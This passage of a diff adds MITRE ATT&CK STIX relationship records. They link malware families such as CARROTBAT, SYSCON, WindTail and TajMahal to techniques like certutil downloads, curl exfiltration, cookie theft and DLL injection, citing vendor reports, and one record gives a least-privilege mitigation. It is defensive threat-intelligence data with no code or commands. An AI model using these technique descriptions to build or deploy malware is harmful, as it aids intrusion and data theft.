+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
+ "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020."
+ },
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0b37289c-b118-45f7-98b2-5efe06cbf0b2",
+ "type": "relationship",
+ "modified": "2020-06-10T15:05:57.806Z",
+ "created": "2020-06-02T15:39:14.548Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
+ "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to download and execute a remote file via [certutil](https://attack.mitre.org/software/S0160).(Citation: Unit 42 CARROTBAT November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--9e81f24e-6f72-44eb-9f19-2a3e7dca14ad",
+ "type": "relationship",
+ "modified": "2020-06-15T15:12:44.278Z",
+ "created": "2020-06-02T15:39:14.573Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
+ "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to download a base64 encoded payload and execute obfuscated commands on the infected host.(Citation: Unit 42 CARROTBAT November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--fd37b358-d005-4662-a200-771f89d491f4",
+ "type": "relationship",
+ "modified": "2020-06-10T15:05:57.820Z",
+ "created": "2020-06-02T15:39:14.578Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
+ "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to delete downloaded files from a compromised host.(Citation: Unit 42 CARROTBAT November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--ec0f8f62-0eb6-4d40-a8c2-c3a083a79acd",
+ "type": "relationship",
+ "modified": "2020-06-15T15:13:27.764Z",
+ "created": "2020-06-02T17:42:45.479Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--edf5aee2-9b1c-4252-8e64-25b12f14c8b3",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use [Tasklist](https://attack.mitre.org/software/S0057) to list running processes.(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b5744487-e865-4ff2-9d69-e98c1148aade",
+ "type": "relationship",
+ "modified": "2020-06-15T15:17:10.120Z",
+ "created": "2020-06-02T18:46:58.573Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--edf5aee2-9b1c-4252-8e64-25b12f14c8b3",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use [Systeminfo](https://attack.mitre.org/software/S0096) to identify system information.(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--01ebd689-8233-409a-a12d-eafb2546f665",
+ "type": "relationship",
+ "modified": "2020-06-15T15:17:10.123Z",
+ "created": "2020-06-02T18:46:58.612Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--edf5aee2-9b1c-4252-8e64-25b12f14c8b3",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[SYSCON](https://attack.mitre.org/software/S0464) has the ability to execute commands through [cmd](https://attack.mitre.org/software/S0106) on a compromised host.(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--4469d943-1e9b-47a9-8e91-cc7883b918cb",
+ "type": "relationship",
+ "modified": "2020-06-10T14:55:06.358Z",
+ "created": "2020-06-02T18:46:58.620Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--edf5aee2-9b1c-4252-8e64-25b12f14c8b3",
+ "target_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
+ "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020."
+ },
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use FTP in C2 communications.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--bceb819a-0ab5-412b-9671-de67e980cb77",
+ "type": "relationship",
+ "modified": "2020-06-02T19:40:02.004Z",
+ "created": "2020-06-02T18:46:58.662Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--edf5aee2-9b1c-4252-8e64-25b12f14c8b3",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
+ "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[SYSCON](https://attack.mitre.org/software/S0464) has been executed by luring victims to open malicious e-mail attachments.(Citation: Unit 42 CARROTBAT November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--94f1a9b7-e068-49b8-a2b7-9eb59055476c",
+ "type": "relationship",
+ "modified": "2020-06-02T19:40:02.006Z",
+ "created": "2020-06-02T18:46:58.670Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4",
+ "target_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBALL](https://attack.mitre.org/software/S0465) has the ability to use FTP in C2 communications.(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--4b569311-24d2-439d-badb-a5076955cda3",
+ "type": "relationship",
+ "modified": "2020-06-02T19:36:48.172Z",
+ "created": "2020-06-02T19:36:48.172Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBALL](https://attack.mitre.org/software/S0465) has the ability to download and install a remote payload.(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--6d5221c3-2efa-4374-8842-8c955fda112b",
+ "type": "relationship",
+ "modified": "2020-06-02T19:36:48.191Z",
+ "created": "2020-06-02T19:36:48.191Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBALL](https://attack.mitre.org/software/S0465) has been executed through users being lured into opening malicious e-mail attachments.(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7c9b61d8-30ff-4594-9cfb-90f2db44ca0e",
+ "type": "relationship",
+ "modified": "2020-06-02T19:36:48.212Z",
+ "created": "2020-06-02T19:36:48.212Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has the ability to decrypt strings using hard-coded AES keys.(Citation: objective-see windtail1 dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--b4016d43-d8c4-4ca2-b119-0681ebe8aaff",
+ "type": "relationship",
+ "modified": "2020-06-04T19:45:16.042Z",
+ "created": "2020-06-04T19:45:16.042Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ },
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has the ability to enumerate the users home directory and the path to its own application bundle.(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1fe64d85-29ca-4cf0-9b30-8d41ebad37fc",
+ "type": "relationship",
+ "modified": "2020-06-25T18:41:35.200Z",
+ "created": "2020-06-04T19:45:16.047Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has the ability to receive and execute a self-delete command.(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d0f83de0-975e-4cc2-8423-e91549f952d9",
+ "type": "relationship",
+ "modified": "2020-06-04T19:45:16.052Z",
+ "created": "2020-06-04T19:45:16.052Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has the ability to automatically exfiltrate files using the macOS built-in utility /usr/bin/curl.(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d811dad0-a813-4293-81fc-55e8ea6a54be",
+ "type": "relationship",
+ "modified": "2020-06-25T18:24:00.683Z",
+ "created": "2020-06-04T20:14:50.400Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has the ability to use the macOS built-in zip utility to archive files.(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9284f651-5078-4b67-90dd-841397029edd",
+ "type": "relationship",
+ "modified": "2020-06-04T20:14:50.442Z",
+ "created": "2020-06-04T20:14:50.442Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has the ability to use HTTP for C2 communications.(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5b8e36dd-264d-45dc-ab38-500b5eb17c33",
+ "type": "relationship",
+ "modified": "2020-06-25T03:46:58.347Z",
+ "created": "2020-06-04T20:14:50.450Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal written CD images and files of interest from previously connected removable drives when they become available again.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--cad9bdcc-41b3-44e2-98d2-fb07fe268838",
+ "type": "relationship",
+ "modified": "2020-06-08T17:03:53.050Z",
+ "created": "2020-06-08T16:57:20.194Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture VoiceIP application audio on an infected host.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--404dfda0-7019-4f0e-a831-4b7c594916e8",
+ "type": "relationship",
+ "modified": "2020-06-08T16:57:20.219Z",
+ "created": "2020-06-08T16:57:20.219Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to take screenshots on an infected host including capturing content from windows of instant messaging applications.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3edc3698-c8a9-4212-b34e-1f3a44fbd00d",
+ "type": "relationship",
+ "modified": "2020-06-08T17:22:35.647Z",
+ "created": "2020-06-08T16:57:20.222Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal documents from the local system including the print spooler queue.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ea05b76d-c443-4b41-8d02-d90b965bd184",
+ "type": "relationship",
+ "modified": "2020-06-11T20:08:11.552Z",
+ "created": "2020-06-08T16:57:20.227Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) can set the KeepPrintedJobs attribute for configured printers in SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers to enable document stealing.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--91c175b7-5c8e-4534-82b1-9bdb1b709a34",
+ "type": "relationship",
+ "modified": "2020-06-08T16:57:20.234Z",
+ "created": "2020-06-08T16:57:20.234Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to inject DLLs for malicious plugins into running processes.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c7d6694e-cfbf-4883-9f4c-8fb3f187e6ae",
+ "type": "relationship",
+ "modified": "2020-06-15T21:19:30.884Z",
+ "created": "2020-06-08T17:03:52.979Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal web session cookies from Internet Explorer, Netscape Navigator, FireFox and RealNetworks applications.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b9b622ad-856a-48f9-a768-ef05bd2914fe",
+ "type": "relationship",
+ "modified": "2020-06-08T17:03:53.022Z",
+ "created": "2020-06-08T17:03:53.022Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
+ "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90",
+ "relationship_type": "mitigates",
+ "description": "Limit permissions for creating, deleting, and otherwise altering compute components in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.(Citation: Mandiant M-Trends 2020)",
+ "id": "relationship--0b74039a-c985-4587-bed7-0876f2ef1e6c",
+ "external_references": [
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
+ }
+ ],
+ "type": "relationship",
+ "modified": "2020-06-18T11:38:27.813Z",
+ "created": "2020-06-08T17:06:00.709Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
